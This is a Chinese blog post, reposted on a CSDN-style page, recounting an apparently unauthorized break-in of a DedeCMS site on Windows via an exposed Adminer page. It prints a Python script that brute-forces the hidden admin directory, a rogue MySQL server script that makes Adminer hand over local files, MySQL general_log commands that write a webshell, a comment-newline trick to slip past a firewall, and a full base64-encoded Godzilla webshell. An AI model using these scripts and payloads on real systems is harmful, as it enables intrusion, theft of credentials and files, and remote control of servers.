记一次偶遇Adminer

最新推荐文章于 2024-05-20 14:46:52 发布
最新推荐文章于 2024-05-20 14:46:52 发布
阅读量661 收藏 1
点赞数
分类专栏: Web安全
原文链接:https://mp.weixin.qq.com/s/XYZWlIZQLgA86tJPiOpM6A?st=89DD19399B44FB5D5C45D1AB28664692BC224B0B623273BCE3EB8FF191B9C0D87ACCF7EC6C415434AA3F536DE083ABFDF2DE4E39ADCE6E59D222ED714AED6EB9AA3A2B3A8F9AEE41CFF59629B6F63EF3C339672E32750BF8B1BEAF69F2F7C60E93598D70E6
版权

又是无聊的一天打开高危扫描器开扫,结果啥也没扫出来,然后就开始苦逼的一个一个站看了。然后发现下面这个站dedecms,服务器windows

 

 

各种历史洞打了一遍都没用,因为是windows可以用这个跑下后台

import requests
import itertools
characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
back_dir = ""
flag = 0
url = "http://www.test.com/tags.php"
data = {
    "_FILES[mochazz][tmp_name]" : "./{p}<</images/adminico.gif",
    "_FILES[mochazz][name]" : 0,
    "_FILES[mochazz][size]" : 0,
    "_FILES[mochazz][type]" : "image/gif"
}

for num in range(1,7):
    if flag:
        break
    for pre in itertools.permutations(characters,num):
        pre = ''.join(list(pre))
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
        print("testing",pre)
        r = requests.post(url,data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            flag = 1
            back_dir = pre
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
print("[+] 前缀为:",back_dir)
flag = 0
for i in range(30):
    if flag:
        break
    for ch in characters:
        if ch == characters[-1]:
            flag = 1
            break
        data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir+ch)
        r = requests.post(url, data=data)
        if "Upload filetype not allow !" not in r.text and r.status_code == 200:
            back_dir += ch
            print("[+] ",back_dir)
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
            break
        else:
            data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"

print("后台地址为:",back_dir)

 

结果跑完居然是dede,这就扯了我访问dede是404.

 

如果找到后台的话还可以用这个洞猜一下管理员账号:
http://www.yulegeyu.com/2018/09/20/dedecms-guess-admin-username-trick/
山穷水尽了随手试了一下adminer.php居然存在(扫描器里有adminer.php的估计扫的目录太多了被封ip了所以不要相信扫描器)

adminer低版本可以利用mysql服务端恶意读取客户端文件

mysql_client.py代码

#coding=utf-8 
import socket
import logging
import sys
logging.basicConfig(level=logging.DEBUG)

filename=sys.argv[1]
sv=socket.socket()
sv.setsockopt(1,2,1)
sv.bind(("",3306))
sv.listen(5)
conn,address=sv.accept()
logging.info('Conn from: %r', address)
conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")
conn.recv(9999)
logging.info("auth okay")
conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")
conn.recv(9999)
logging.info("want file...")
wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filename
conn.sendall(wantfile)
content=conn.recv(9999)
logging.info(content)
conn.close()

 

使用方法直接服务器执行
python mysql_client.py "F:\dede\index.php"
然后adminer填你服务器地址,账号密码随便填连接就读到了文件,服务器3306端口要对外开放
然后就是又开始读文件了,先随意读一下,让它报出web路径来

因为是dedecms所以直接读 data\common.inc.php

文件不存在?直接放F盘下读一下

发现账号为root,直接登录adminer.php通过日志getshell

set global general_log=on 开启general log模式set global general_log_file='F:\\*****\\shell.php'; 设置日志路径select '<?php eval($_POST['pwd']);?>'; 写shell毫无疑问最后这里被拦了,抓个包来测吧,select '<?php '不拦

select+'<?php+phpinfo();+?>'拦掉

使用注释换行绕过select+'<?php+//%0Aphpinfo();+?>'

写个哥斯拉的马

select '<?php //"%0A$a="ICAgIHNlc3Npb25fc3RhcnQoKTsKICAgIEBzZXRfdGltZV9saW1pdCgwKTsKCUBlcnJvcl9yZXBvcnRpbmcoMCk7CiAgICBmdW5jdGlvbiBFKCRELCRLKXsKICAgICAgICBmb3IoJGk9MDskaTxzdHJsZW4oJEQpOyRpKyspIHsKICAgICAgICAgICAgJERbJGldID0gJERbJGldXiRLWyRpKzEmMTVdOwogICAgICAgIH0KICAgICAgICByZXR1cm4gJEQ7CiAgICB9CiAgICBmdW5jdGlvbiBRKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2VuY29kZSgkRCk7CiAgICB9CiAgICBmdW5jdGlvbiBPKCREKXsKICAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgkRCk7CiAgICB9CiAgICAkUD0nd2hvYW1pJzsKICAgICRWPSdwYXlsb2FkJzsKICAgICRUPScxYjA2NzliZTcyYWQ5NzZhJzsKICAgIGlmIChpc3NldCgkX1BPU1RbJFBdKSl7CiAgICAgICAgJEY9TyhFKE8oJF9QT1NUWyRQXSksJFQpKTsKICAgICAgICBpZiAoaXNzZXQoJF9TRVNTSU9OWyRWXSkpewogICAgICAgICAgICAkTD0kX1NFU1NJT05bJFZdOwogICAgICAgICAgICAkQT1leHBsb2RlKCd8JywkTCk7CiAgICAgICAgICAgIGNsYXNzIEN7cHVibGljIGZ1bmN0aW9uIG52b2tlKCRwKSB7ZXZhbCgkcC4iIik7fX0KICAgICAgICAgICAgJFI9bmV3IEMoKTsKCQkJJFItPm52b2tlKCRBWzBdKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwwLDE2KTsKICAgICAgICAgICAgZWNobyBRKEUoQHJ1bigkRiksJFQpKTsKICAgICAgICAgICAgZWNobyBzdWJzdHIobWQ1KCRQLiRUKSwxNik7CiAgICAgICAgfWVsc2V7CiAgICAgICAgICAgICRfU0VTU0lPTlskVl09JEY7CiAgICAgICAgfQogICAgfQ==";eval%01(base64_decode%01($a));//"; ?>'

 

 

成功连上,system

 

zhangge3663
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
mysql 任意文件读取漏洞_Adminer任意文件读取漏洞
weixin_33918358的博客
02-07 2415
软件简介官方网站:https://www.adminer.org/Adminer是一款轻量级的Web端数据库管理工具,支持MSSQL、MSSQL、Oracle、SQLite、PostgreSQL等众多主流数据库,类似于phpMyAdmin的MySQL管理客户端,整个程序只有一个PHP文件,易于使用安装,支持连接远程数据库。漏洞原理Adminer任意文件读取漏洞其实来源于MySQL“LOAD DAT...
Adminer≤4.6.2任意文件读取漏洞1
08-03
Adminer≤4.6.2 任意件读取漏洞0x01 前SQLite、PostgreSQL 等众多主流数据库,类似于 phpMyAdmin 的 MySQL 管理客
adminer4.2.5.php,Adminer 4.2.1 发布,MySQL 管理客户端
weixin_35167817的博客
04-15 107
Adminer 4.2.1 发布,MySQL 管理客户端发布于 2015-03-11 07:55:12 | 457 次阅读 | 评论: 0 | 来源: 网友投递Adminer MySQL管理客户端Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支...
CVE-2021-21311复现学习
最新发布
shierbai的博客
05-20 572
如图在物理机(不属于上述任何一个ip)输入要访问的主机及其端口(这里这个ip就是在环境中属于内网我们无法直接访问到的那个服务器,而通过ssrf可以让我们伪造另一个服务端去发送请求来返回我们想要的数据),可以看到在139端显示这个请求是由138发出的,而不是自己的ip,这样就完成了ssrf,不过在利用上博主还不太能够善用。adminer版本是4.7.8,是php编写的数据库管理工具,存在漏洞CVE-2021-21311,它是 Adminer 版本 4.0.0 中的服务器端请求伪造,到 4.7.9。
vue-cli项目搭建步骤详解
热门推荐
yw00yw的博客
07-25 1万+
使用vue webpack 模板搭建项目步骤: 1. 安装 node.js(npm),因为会用到npm包管理工具下载项目依赖等 2. 安装 webpack: npm install webpack -g 3. 安装 vue-cli: npm install vue-cli –g 4. 通过vue-cli,初始化vue项目: vue init webpack projectName(项目名...
渗透测试中遇到的Adminer任意文件读取漏洞
网安君的博客
01-17 6212
在某次做项目的时候遇到一个mysql.php,打开发现是adminer,网上搜到任意文件读取复现的时候,用了网上很多的python脚本都无法运行起来(例如:https://github.com/allyshka/Rogue-MySql-Server)。在GitHub找到一个可以运行的脚本,原理是模拟mysql的运行。
HTB-AdmirerToo
qq_53142368的博客
07-12 1967
HTB
adminer-PHP
06-20
本作品为分享工作室定制作品, 官方在2013-05-19发布3.7.0新版本adminer, 却没能更好地解决兼容问题, 在php 5.3,5.4,5.5上均有异常, 同时也有许多html代码兼容bug, 为此, 我们选择了为其做一次定制版, 同时本工具也...
adminer v4.7.4
09-29
Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持P
adminer
04-06
定制版更新:本作品为分享工作室定制作品, 官方在2013-05-19发布3.7.0新版本adminer, 却没能更好地解决兼容问题, 在php 5.3,5.4,5.5上均有异常, 同时也有许多html代码兼容bug, 为此, 我们选择了为其做一次定制版, ...
adminer访问sqlite
12-09
1.在php.ini中开启sqlite扩展 2.把adminersqlite.php放在adminer.php旁边 3.浏览器访问adminersqlite.php,系统选sqlite3点登录 4.db填写sqlite数据库文件名,点使用
adminer v4.7.6
08-19
Adminer是一个类似于phpMyAdmin的MySQL管理客户端。整个程序只有一个PHP文件,易于使用和安装。Adminer支持多语言(已自 带11种翻译语言文件,可以按自己的需求翻译相应的语言)。支持P
HackTheBox::Admirer
aya3t的博客
10-14 794
HackTheBox::Admirer
Adminer
ppggxn的博客
01-30 1287
不用Navicat也能轻松访问数据库 Adminer, “Database management in a single PHP file”, 比起小猫小海豚轻便不少。 从官网下载Adminer源文件后改名为index.php 安装 php pacman -S php 取消** /etc/php/php.ini** 中 下面行前面的注释 : extension=mysqli exte...
vulhub中Adminer远程文件读取漏洞复现(CVE-2021-43008)
yougexiaojiuguan的博客
02-03 1188
漏洞复现过程的录,也是为了方便自己查看
某交易平台审计--前台到后台getshell
angel的博客
03-08 498
地址 https://mp.weixin.qq.com/s/omPPZpq0CNqtThmwYMfo0A
ctfshow菜鸡杯 部分wp
Firebasky的博客
08-30 2175
参加了ctfshow组织的菜鸡杯,自我感觉还是比较不错的,让自己学习了好多新东西。还有感谢师傅们的耐心解答。真的真的感谢。 1. misc3 这道题考察的是jsfuck编码(参考),直接将编码放入浏览器的控制台进行解码。需要去掉最后的括号 2. misc1 这道题让自己学习了好多。一个是crc校验循环冗余校验,另一个是斐波那契数列脚本读取文件。斐波那契数列 下载文件,里面是一张照片参考信息,可能是照片的长宽高隐写,这里可以使用crc暴力破解的脚本。参考链接 import zlib import str.
phpmyadmin常见getshell的方法
Blue的博客
06-10 2476
1、利用条件2、如果满足以上条件可以直接写shell在实际写webshell的时候,我们经常会遭受到secure_file_priv的阻拦,secure_file_priv这个配置参数用来限制load data、outfile、load_file()的使用。在高版本的mysql中默认为NULL,就是不让导入和导出解决办法:在Windows下可在my.ini的[mysqld]里面,添加secure_file_priv=在linux下可在/etc/my.cnf的[mysqld]里面,添加secure_file_
【封神台】漏洞挖掘XXE wp
孤桜懶契
08-23 541
前言 掌控安全里面的靶场漏洞挖掘XXE实体注入,学习一下! 做XXE题目之前我们先了解一下XXE实体注入的原理和利用方法 XXE基础知识 XML用于标电子文件使其具有结构性的标语言,可以用来标数据、定义数据类型,是一种允许用户对自己的标语言进行定义的源语言。XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素 所有的 XML 文档(以及 HTML 文档)均由以下简单的构建模块构成:元素、属性、实体、PCDATA、CDATA,由于网上太多介绍就不详细说了 DTD(文档类型定
centos安装Adminer
09-25
Adminer是一个免费的Web管理数据库的工具,支持多种数据库。安装Adminer非常简单,以下是在CentOS上安装Adminer的步骤: 1. 安装Apache和PHP ``` sudo yum install httpd php php-mysql ``` 2. 下载Adminer ``` ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值